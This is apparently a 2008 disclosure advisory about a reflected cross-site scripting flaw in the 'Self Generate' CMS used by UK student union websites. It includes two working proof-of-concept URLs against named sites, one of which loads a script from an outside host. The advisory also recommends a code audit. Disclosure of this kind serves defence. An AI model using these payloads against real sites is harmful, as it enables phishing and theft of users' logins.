selfgen-xss.txt

`Release Date: August 23 2008  
Platform: Web  
Severity: Important  
Summary:  
  
Bam host a large number of websites for student unions throughout the  
uk using a custom cms system called Self Generate. This vulnerability  
affects all of these websites and allows attackers to inject arbitrary  
html/javascript code into a browser session.  
  
Status:  
  
We have been unable to contact BamUK, SU Marketing, or Self Generate  
about this vulnerability. They have no email addresses listed and their  
contact form consistently returns error messages.  
  
Details:  
  
There are various instances throughout the cms system where html code  
can be injected into the page. The majority of these instances are  
where ‘page’ is passed as a GET value, eg. page=injected_data, which is  
improperly cleaned before being displayed in the sidebar. Successful  
exploitation of this could lead to users giving away their login  
details through a cleverly crafted url sent in a phishing email.  
  
Poc:  
http://www.ubuonline.co.uk/games/?referrer=main&page=%22%3E%3Cscript%20src=http://vuln.xssed.net/thirdparty/scripts/ckers.org.js%3E%3C/script%3E  
  
http://www.hullstudent.com/content/?page=%22%3Cscript%3Ealert(document.location)%3C/script%3E&text_only=2  
  
Recommendations:  
  
Use existing contacts at Bam/Self Generate to ask whether your website  
is secure against all attacks (including xss and sql injection), and  
not just the ones we discovered today. We believe that since the code  
is heavily reused across all websites, it should be a relatively simple  
fix following a full code audit.  
  
Users may also consider switching to an alternative cms system hosted  
inhouse which would make security auditing and fixing of bugs like  
these much easier.  
  
--   
Kærast  
  
`